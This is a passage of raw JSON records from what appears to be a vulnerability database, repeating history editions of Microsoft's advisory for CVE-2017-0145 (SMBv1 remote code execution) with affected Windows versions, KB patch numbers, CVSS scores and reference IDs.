Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 
x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:48:04", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T19:05:15", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012215", "KB4012212", "KB4012598", "KB3210721", "KB3212646", "KB4012606", "KB4013198", "KBMS16-110, 3187754", "KB3210720", "KB4013429", "KB3205401", "KB3205409", "KB4012213", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:05:15", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T20:47:14", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB4014077", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, 